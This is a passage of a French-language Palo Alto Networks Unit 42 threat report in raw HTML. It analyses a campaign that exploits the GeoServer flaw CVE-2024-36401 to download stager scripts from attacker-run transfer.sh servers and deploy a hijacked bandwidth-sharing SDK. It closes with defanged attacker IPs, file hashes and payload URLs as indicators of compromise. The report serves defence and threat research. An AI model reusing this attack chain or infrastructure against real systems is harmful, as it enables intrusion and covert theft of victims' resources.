alignnone\"><img  class=\"wp-image-152674 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7.png\" alt=\"Graphique en barres montrant la r\u00e9partition des instances\u00a0GeoServer expos\u00e9es parmi les cinq principaux pays. La Chine affiche le nombre le plus \u00e9lev\u00e9 (plus de 2\u00a0500), suivie par les \u00c9tats-Unis, l\u2019Allemagne, le Royaume-Uni et Singapour avec des volumes nettement inf\u00e9rieurs.\" width=\"1000\" height=\"619\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7.png 2048w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7-711x440.png 711w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7-1131x700.png 1131w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7-768x475.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7-1536x950.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-152674\" class=\"wp-caption-text\">Figure 9. R\u00e9partition des instances GeoServer expos\u00e9es dans les cinq pays o\u00f9 elles sont le plus souvent h\u00e9berg\u00e9es.<\/figcaption><\/figure>\n<h2><a id=\"post-156324-_heading=h.nio06wkna6km\"><\/a>Analyse de la cha\u00eene d\u2019attaque<\/h2>\n<p>Nous avons identifi\u00e9 plusieurs strat\u00e9gies d\u2019exploitation distinctes dans le cadre de cette campagne. Toutes visent \u00e0 d\u00e9ployer et ex\u00e9cuter un SDK sur le syst\u00e8me de la victime. Cette analyse se concentre sur une variante du SDK que nous avons appel\u00e9e \u00ab\u00a0<span style=\"font-family: 'courier new', courier, monospace;\">z593\u00a0<\/span>\u00bb. La Figure\u00a010 illustre la premi\u00e8re \u00e9tape\u00a0: l\u2019exploitation de la vuln\u00e9rabilit\u00e9\u00a0CVE-2024-36401 pour t\u00e9l\u00e9charger le payload malicieux (z593) depuis un h\u00f4te malveillant contr\u00f4l\u00e9 par l\u2019attaquant.<\/p>\n<figure id=\"attachment_156424\" aria-describedby=\"caption-attachment-156424\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156424 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10.png\" alt=\"Image affichant un extrait de code en format\u00a0XML, li\u00e9 \u00e0 WFS et comprenant des r\u00e9f\u00e9rences aux ex\u00e9cutables Java\u00a0Runtime et \u00e0 des chemins syst\u00e8me. L\u2019arri\u00e8re-plan de la zone de code est sombre, avec du texte mis en \u00e9vidence en vert, rouge, jaune et blanc.\" width=\"1000\" height=\"218\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10.png 2048w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10-786x171.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10-1920x418.png 1920w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10-768x167.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10-1536x335.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156424\" class=\"wp-caption-text\">Figure 10. \u00c9tape 1 : exploitation initiale permettant de t\u00e9l\u00e9charger le payload de la deuxi\u00e8me \u00e9tape.<\/figcaption><\/figure>\n<p>Au cours de la deuxi\u00e8me \u00e9tape, l\u2019attaquant exploite \u00e0 nouveau la vuln\u00e9rabilit\u00e9\u00a0CVE-2024-36401 afin d\u2019ex\u00e9cuter le payload t\u00e9l\u00e9charg\u00e9 lors de la premi\u00e8re \u00e9tape (<span style=\"font-family: 'courier new', courier, monospace;\">z593<\/span>), comme le montre la Figure\u00a011.<\/p>\n<figure id=\"attachment_156435\" aria-describedby=\"caption-attachment-156435\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156435 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-62087-156324-11.png\" alt=\"Capture d\u2019\u00e9cran affichant du code\u00a0XML li\u00e9 \u00e0 un WFS, avec des URL d\u2019espace de noms et une requ\u00eate utilisant un environnement Java\u00a0Runtime.\" width=\"1000\" height=\"243\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-62087-156324-11.png 1678w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-62087-156324-11-786x191.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-62087-156324-11-768x187.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-62087-156324-11-1536x373.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156435\" class=\"wp-caption-text\">Figure 11. \u00c9tape 2 : exploitation permettant d\u2019ex\u00e9cuter le payload de la deuxi\u00e8me \u00e9tape.<\/figcaption><\/figure>\n<p>Plut\u00f4t que d\u2019utiliser un serveur web\u00a0HTTP standard, les attaquants ont d\u00e9ploy\u00e9 des instances priv\u00e9es d\u2019un serveur de partage de fichiers bas\u00e9 sur <a href=\"https:\/\/github.com\/dutchcoders\/transfer.sh?tab=readme-ov-file#transfersh---\" target=\"_blank\" rel=\"noopener\">transfer.sh<\/a> afin de distribuer leurs payloads. L\u2019instance de transfer.sh est h\u00e9berg\u00e9e sur l\u2019une des adresses\u00a0IP de distribution contr\u00f4l\u00e9es par les attaquants (cf. Figure\u00a012).<\/p>\n<p><figure id=\"attachment_156446\" aria-describedby=\"caption-attachment-156446\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156446 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-64987-156324-12.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un site web intitul\u00e9 \u00ab\u00a0Easy file sharing from the command line\u00a0\u00bb, affichant des exemples de commandes d\u2019upload de fichiers et une zone de glisser-d\u00e9poser, avec un bouton \u00ab\u00a0Learn more\u00a0\u00bb en bas. Une adresse\u00a0IP appara\u00eet en haut \u00e0 gauche. \" width=\"1000\" height=\"496\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-64987-156324-12.png 1427w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-64987-156324-12-786x390.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-64987-156324-12-1411x700.png 1411w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-64987-156324-12-768x381.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156446\" class=\"wp-caption-text\">Figure 12. Page d\u2019index d\u2019un serveur transfer.sh h\u00e9berg\u00e9 sur<span style=\"font-family: 'courier new', courier, monospace;\"> 64.226.112[.]52:8080<\/span> par les attaquants.<\/figcaption><\/figure>Les d\u00e9ploiements d\u00e9crits dans la Figure\u00a012 \u00e9taient actifs sur le port\u00a08080 et r\u00e9partis sur deux adresses\u00a0IP contr\u00f4l\u00e9es par les attaquants\u00a0:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">37.187.74[.]75<\/span><\/li>\n<\/ul>\n<p>Si l\u2019exploitation initiale aboutit, le script agit alors comme un \u00ab\u00a0stager\u00a0\u00bb. Deux autres fichiers sont alors t\u00e9l\u00e9charg\u00e9s, comme l\u2019illustre la Figure\u00a013.<\/p>\n<p><figure id=\"attachment_156457\" aria-describedby=\"caption-attachment-156457\" style=\"width: 635px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156457 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-67951-156324-13.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un terminal affichant des commandes pour t\u00e9l\u00e9charger des fichiers avec wget depuis des adresses\u00a0IP sp\u00e9cifiques.\" width=\"635\" height=\"97\" \/><figcaption id=\"caption-attachment-156457\" class=\"wp-caption-text\">Figure 13. Contenu du fichier z593 depuis <span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52<\/span> menant \u00e0 des fichiers suppl\u00e9mentaires.<\/figcaption><\/figure><span style=\"font-family: 'courier new', courier, monospace;\">z401<\/span> est le premier script identifi\u00e9 dans la Figure\u00a013. Il est con\u00e7u pour \u00eatre furtif\u00a0: il cr\u00e9e un r\u00e9pertoire cach\u00e9 et y place l\u2019ex\u00e9cutable principal, comme le montre la Figure\u00a014.<\/p>\n<p><figure id=\"attachment_156468\" aria-describedby=\"caption-attachment-156468\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156468 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-70557-156324-14.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un terminal affichant des commandes\u00a0Unix pour supprimer, cr\u00e9er et naviguer dans des r\u00e9pertoires, ainsi qu\u2019une commande\u00a0wget permettant de t\u00e9l\u00e9charger un fichier depuis une adresse\u00a0IP donn\u00e9e.\" width=\"1000\" height=\"331\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-70557-156324-14.png 1118w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-70557-156324-14-786x260.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-70557-156324-14-768x254.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156468\" class=\"wp-caption-text\">Figure 14. Contenu de <span style=\"font-family: 'courier new', courier, monospace;\">z401<\/span> depuis <span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52<\/span>.<\/figcaption><\/figure>La Figure\u00a015 illustre le fonctionnement du second script mentionn\u00e9 dans la Figure\u00a013 (<span style=\"font-family: 'courier new', courier, monospace;\">z402<\/span>), qui pr\u00e9pare l\u2019environnement puis lance l\u2019ex\u00e9cutable principal en lui transmettant la cl\u00e9 d\u2019application.<\/p>\n<p><figure id=\"attachment_156479\" aria-describedby=\"caption-attachment-156479\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156479 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-73667-156324-15.png\" alt=\"Texte affich\u00e9 dans une fen\u00eatre de terminal montrant une interface en ligne de commande, avec du code impliqu\u00e9 dans la configuration d\u2019une variable d\u2019environnement nomm\u00e9e \u00ab\u00a0PATH\u00a0\u00bb.\" width=\"1000\" height=\"111\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-73667-156324-15.png 1824w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-73667-156324-15-786x87.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-73667-156324-15-768x85.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-73667-156324-15-1536x170.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156479\" class=\"wp-caption-text\">Figure 15. Contenu de <span style=\"font-family: 'courier new', courier, monospace;\">z402<\/span> depuis <span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52<\/span>.<\/figcaption><\/figure>Une fois lanc\u00e9, l\u2019ex\u00e9cutable fonctionne de mani\u00e8re furtive en arri\u00e8re-plan. Il surveille les ressources de l\u2019appareil et partage illicitement la bande passante de la victime d\u00e8s que possible. L\u2019attaquant g\u00e9n\u00e8re alors des revenus passifs.<\/p>\n<p>Les fichiers ex\u00e9cutables issus de ces tentatives d\u2019exploitation sont con\u00e7us pour interagir avec deux services l\u00e9gitimes\u00a0: l\u2019application et le SDK d\u00e9tourn\u00e9s. Tous deux offrent normalement aux utilisateurs un moyen de g\u00e9n\u00e9rer un revenu passif en partageant les ressources r\u00e9seau d\u2019appareils inactifs.<\/p>\n<p>Dans ce contexte, les attaquants d\u00e9tournent les fonctionnalit\u00e9s de l\u2019application ou du SDK. \u00c0 l\u2019image des mineurs de crypto-monnaie qui r\u00e9quisitionnent les ressources syst\u00e8me \u00e0 des fins lucratives, ces applications exploit\u00e9es exploitent elles aussi les ressources des appareils pour en tirer un gain financier. Cependant, contrairement aux mineurs malveillants, ce type d\u2019abus d\u2019applications ou de SDK reste g\u00e9n\u00e9ralement plus discret. Il attire moins l\u2019attention et g\u00e9n\u00e8re des profits plus modestes pour l\u2019acteur malveillant, ce qui peut contribuer \u00e0 prolonger ses op\u00e9rations tout en \u00e9chappant \u00e0 la d\u00e9tection.<\/p>\n<h3><a id=\"post-156324-_heading=h.mplwv1d1284o\"><\/a><strong>Analyse de l\u2019application d\u00e9tourn\u00e9e<\/strong><\/h3>\n<p>Une analyse approfondie du binaire install\u00e9 par les attaquants sur le serveur de la victime r\u00e9v\u00e8le qu\u2019ils ont utilis\u00e9 <a href=\"https:\/\/github.com\/dart-lang\" target=\"_blank\" rel=\"noopener\">Dart<\/a>, comme l\u2019illustre la Figure\u00a016. Dart est un langage de programmation open\u00a0source. Deux raisons principales semblent avoir motiv\u00e9 ce choix\u00a0:<\/p>\n<ul>\n<li>Mon\u00e9tisation via SDK\u00a0: les attaquants ont utilis\u00e9 Dart pour int\u00e9grer le SDK de revenus passifs et interagir avec son service. Cette interaction est con\u00e7ue pour garantir la g\u00e9n\u00e9ration et la collecte de flux de revenus passifs au b\u00e9n\u00e9fice de l\u2019acteur malveillant.<\/li>\n<li>Compatibilit\u00e9 multiplateforme sous Linux\u00a0: les attaquants ont \u00e9galement tir\u00e9 parti de la portabilit\u00e9 inh\u00e9rente de Dart. Ils ont exploit\u00e9 cette caract\u00e9ristique pour compiler l\u2019ex\u00e9cutable sp\u00e9cifiquement pour les architectures\u00a0Linux, \u00e9largissant ainsi leur champ potentiel de cibles.<\/li>\n<\/ul>\n<p>L\u2019adoption de Dart \u00e0 ces fins est notable, car elle peut repr\u00e9senter une tentative d\u2019\u00e9chapper aux signatures de d\u00e9tection, g\u00e9n\u00e9ralement davantage ax\u00e9es sur les langages couramment associ\u00e9s aux malwares.<\/p>\n<figure id=\"attachment_156490\" aria-describedby=\"caption-attachment-156490\" style=\"width: 710px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156490 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-76657-156324-16.png\" alt=\"Capture d\u2019\u00e9cran d\u2019une interface de programmation affichant une liste de code et de fonctions principalement associ\u00e9es au langage\u00a0Dart. Une cha\u00eene de caract\u00e8res sp\u00e9cifique est mise en \u00e9vidence. \" width=\"710\" height=\"400\" \/><figcaption id=\"caption-attachment-156490\" class=\"wp-caption-text\">Figure 16. Binaire utilisant Dart pour une compatibilit\u00e9 multiplateforme.<\/figcaption><\/figure>\n<h3><a id=\"post-156324-_heading=h.9bn26zgmj8bg\"><\/a><strong>Analyse du SDK d\u00e9tourn\u00e9<\/strong><\/h3>\n<p>Afin de v\u00e9rifier la nature du composant\u00a0SDK utilis\u00e9 dans cette campagne, nous avons compar\u00e9 le binaire du SDK d\u00e9tourn\u00e9 par l\u2019attaque avec la version officielle du SDK disponible sur le site de l\u2019\u00e9diteur. Notre analyse a confirm\u00e9 que les deux fichiers \u00e9taient identiques. Cela sugg\u00e8re que les attaquants utilisent un SDK l\u00e9gitime et non modifi\u00e9, ce qui leur permet potentiellement de contourner la d\u00e9tection par les solutions de protection des postes de travail.<\/p>\n<h2><a id=\"post-156324-_heading=h.kpniz0doew6j\"><\/a>Conclusion<\/h2>\n<p>Cette campagne en cours illustre une \u00e9volution significative dans la mani\u00e8re dont les adversaires mon\u00e9tisent les syst\u00e8mes compromis. La strat\u00e9gie centrale des attaquants repose sur une mon\u00e9tisation furtive et persistante plut\u00f4t que sur une exploitation agressive des ressources. Ils y parviennent en d\u00e9ployant des ex\u00e9cutables qui d\u00e9tournent des services l\u00e9gitimes de revenus passifs, exploitant discr\u00e8tement les ressources des appareils pour des activit\u00e9s telles que le partage de bande passante. Cette approche privil\u00e9gie une g\u00e9n\u00e9ration de revenus \u00e0 long terme et \u00e0 faible visibilit\u00e9 plut\u00f4t que des techniques facilement d\u00e9tectables.<\/p>\n<p>Pour contrer cette menace, nous recommandons vivement d\u2019appliquer les correctifs et mises \u00e0 jour disponibles d\u00e8s que possible.<\/p>\n<p>Les clients de Palo\u00a0Alto\u00a0Networks sont mieux prot\u00e9g\u00e9s contre les vuln\u00e9rabilit\u00e9s et les malwares gr\u00e2ce aux produits et services suivants\u00a0:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-threat-prevention\" target=\"_blank\" rel=\"noopener\">Advanced\u00a0Threat Prevention<\/a> peut bloquer les attaques gr\u00e2ce aux bonnes pratiques via la signature de pr\u00e9vention des menaces\u00a095463. De plus, ATP inclut une protection bas\u00e9e sur le machine\u00a0learning capable de d\u00e9tecter le trafic d\u2019exploitation en temps r\u00e9el.<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-wildfire\" target=\"_blank\" rel=\"noopener\">Advanced\u00a0WildFire<\/a> peut emp\u00eacher le transfert de l\u2019ex\u00e9cutable personnalis\u00e9.<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced\u00a0URL Filtering<\/a> et <a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-dns-security\" target=\"_blank\" rel=\"noopener\">Advanced\u00a0DNS Security<\/a> permettent de bloquer des URL malveillantes associ\u00e9es \u00e0 cette activit\u00e9..<\/li>\n<\/ul>\n<p>Si vous pensez que votre entreprise a pu \u00eatre compromise ou si vous faites face \u00e0 une urgence, contactez <a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">l\u2019\u00e9quipe Unit\u00a042 de <\/a>r\u00e9ponse aux incidents ou composez l\u2019un des num\u00e9ros suivants\u00a0:<\/p>\n<ul>\n<li>Am\u00e9rique du Nord\u00a0: Gratuit\u00a0: +1 (866) 486-4842 (866.4.UNIT42)<\/li>\n<li>Royaume-Uni\u00a0: +44\u00a020\u00a03743\u00a03660<\/li>\n<li>Europe et Moyen-Orient\u00a0: +31.20.299.3130<\/li>\n<li>Asie\u00a0: +65.6983.8730<\/li>\n<li>Japon\u00a0: +81\u00a050\u00a01790\u00a00200<\/li>\n<li>Australie\u00a0: +61.2.4062.7950<\/li>\n<li>Inde\u00a0: 000 800 050 45107<\/li>\n<\/ul>\n<p>Palo\u00a0Alto\u00a0Networks a partag\u00e9 ces conclusions avec les autres membres de la Cyber\u00a0Threat\u00a0Alliance (CTA). Les membres de la CTA s\u2019appuient sur ces renseignements pour d\u00e9ployer rapidement des mesures de protection aupr\u00e8s de leurs clients et perturber de mani\u00e8re coordonn\u00e9e les activit\u00e9s des cybercriminels. Cliquez ici pour en savoir plus sur la <a href=\"https:\/\/www.cyberthreatalliance.org\" target=\"_blank\" rel=\"noopener\">Cyber Threat Alliance<\/a>.<\/p>\n<h2><a id=\"post-156324-_heading=h.2jmhtg5znzny\"><\/a>Indicateurs de compromission<\/h2>\n<h3><a id=\"post-156324-_heading=h.11vvj4t9i204\"><\/a>Adresses\u00a0IP et ports\u00a0TCP utilis\u00e9s pour l\u2019infrastructure de la campagne<\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">37.187.74[.]75:8080<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52:8080<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-156324-_heading=h.tp7ld5ygwo7u\"><\/a>Artefacts de la campagne<\/h3>\n<table style=\"width: 101.05%;\">\n<tbody>\n<tr style=\"height: 24px;\">\n<td style=\"text-align: center; height: 24px; width: 59.348%;\"><strong>SHA256 du fichier<\/strong><\/td>\n<td style=\"text-align: center; height: 24px; width: 21.8553%;\"><strong>URL contact\u00e9e par le fichier<\/strong><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">89f5e7d66098ae736c39eb36123adcf55851268973e6614c67e3589e73451b24<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/w1wOYGVLEX\/a101<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">6db4b685f413a3e02113677eee10a29c7406414f7f4da611f31d13e3f595f85d<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/IyxzymKCp2\/a102<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">4e4a467abe1478240cd34a1deaef019172b7834ad57d46f89a7c6c357f066fdb<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/cE58oqrYGO\/a193<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">4e40a0df8f4ba4a87ab8fc64950c67f6725a7e8f14a0a84a4ed79b3a8924ba19<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/YDjV1ocro3\/a401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">663970530e764f91b0be43936331e6c0a93610db6b86c6c4b64de270ae4d4630<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/3g5eBN8nqv\/a402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">7c18fe9da63c86f696f9ad7b5fcc8292cac9d49973ba12050c0a3a18b7bd1cc9<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/JadF0ucQNf\/a593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">84ee11f40da3538e4601456912c3efa0e92a903948812fd17fe650c5f7ac33ad<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/Do4YwzvAJN\/alog<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">0971264967ba8d461ce98f86b90810493c5e22fc80bf61f0d0eb7a2599a7f77a<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/DQ5ydzkPnK\/c401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">491f5af9d29f52a6df026159a8ebd27ee6e27151ea78c4782eb05b2c5d39bfc3<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/a8HejAHngH\/c402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">a852133ff7f24b14e4224e7052f6d309353b4838fe5f17d25c712d7a1dd6e80a<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/vLs5vxpDgV\/c593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">b66c64ccd7b9c96fad53f6d3aa0441e46eca899ad8d97964573e41c94fccddba<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/KaMJw2fsDW\/d101<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">f340abe5689e51cf78b10165cb93ab8a2988d0fedd0e74c74fc23ac2dca93a13<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/TMuAS1wp8m\/d102<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">fc28f97f818d07fd8824333de26e5a0ca0d3fe7233d86f7e227e4838cfea0ca4<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/iKA3jGXk6x\/d193<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">7c0c69aa0dcfc937c1fef8d42c74f7e46d128898c1d99d3362f2d18397be36ae<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/fK4SCflkNg\/d401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">33aad585d6280d1921b5f46f8894ee05d426c7751c2133ed5484bf65af587576<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/Y1WT747MRP\/d402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">2c5581572ec4877df8ec3e5d2b30bfff5718ecd27d8b3dbe2f393aa5821e7ddd<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/H0cwXMzCrJ\/d593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">0e2b92991186bc8a817e0187a9b58928969350bc8d8ad7e6b6cd91c185a7e03c<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/XA8Dkr1CJ4\/dlog<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">5bc5dfeaeb43fb1e967cad028f8d2c48f5db17ee6c23c383faee74455c2f1f33<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/52F6SqfuuS\/e101<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 